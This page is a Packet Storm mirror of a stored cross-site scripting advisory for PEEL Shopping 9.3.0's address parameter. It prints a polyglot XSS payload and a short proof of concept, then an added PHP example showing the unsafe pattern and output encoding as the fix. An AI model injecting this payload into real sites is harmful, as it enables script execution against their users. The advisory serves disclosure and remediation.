PEEL Shopping 9.3.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition





Published on February 12th, 2021


PEEL Shopping 9.3.0 Cross Site Scripting
Posted Feb 11, 2021
Authored by Anmol K Sachan

PEEL Shopping version 9.3.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
MD5 | 6784a3a8c9528a3c39f7b4d5f5a6d69a
# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
# Date: 2021-02-11
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10 XAMPP
# This application is vulnerable to stored XSS.
# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
# Vulnerable parameters: 'Address'
# Payload used:

jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//x3csVg/x3e

# POC: On the same page where the payload was injected, click on the text box to edit the address.
# The injected JavaScript (XSS) then executes.
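
The fix for this class of bug is to encode the stored address when it is written back into the edit form. The PHP below is an added example, not code from PEEL Shopping or from the advisory author. It assumes the address is echoed into a quoted value attribute, and the function names and the field name are hypothetical.

```php
<?php
// Added example: hypothetical helpers, NOT code from PEEL Shopping.
// Assumption: the stored address is written into a quoted value="" attribute.

// Vulnerable pattern: stored text is concatenated into the attribute unchanged,
// so a double quote inside it closes the attribute and the rest becomes markup.
function render_address_unsafe(string $stored): string
{
    return '<input type="text" name="address" value="' . $stored . '">';
}

// Hardened pattern: encode at output time for a quoted HTML attribute.
// ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of making htmlspecialchars() return an empty string.
function render_address_safe(string $stored): string
{
    $encoded = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="address" value="' . $encoded . '">';
}

// Returns the decoded attribute value if the stored text stayed inside the
// value attribute, or null if a raw double quote broke the attribute boundary.
function value_if_contained(string $html): ?string
{
    $pattern = '/^<input type="text" name="address" value="([^"]*)">$/';
    if (preg_match($pattern, $html, $m) !== 1) {
        return null;
    }
    return html_entity_decode($m[1], ENT_QUOTES, 'UTF-8');
}

// Payload string exactly as printed in this advisory, plus a benign address
// (constructed) to show that encoding does not damage legitimate input.
$payload = <<<'TXT'
jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//x3csVg/x3e
TXT;
$samples = ['advisory payload' => $payload, 'benign' => "12 rue de l'Exemple, \"Bat. B\""];

foreach ($samples as $label => $stored) {
    $unsafe = value_if_contained(render_address_unsafe($stored));
    $safe   = value_if_contained(render_address_safe($stored));
    printf("%s: unsafe contained=%s, safe contained=%s, round trip intact=%s\n",
        $label, var_export($unsafe !== null, true),
        var_export($safe !== null, true), var_export($safe === $stored, true));
}
```

Encoding at output time keeps the stored text byte-for-byte, so the user still sees what they typed while the browser treats it only as attribute data.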
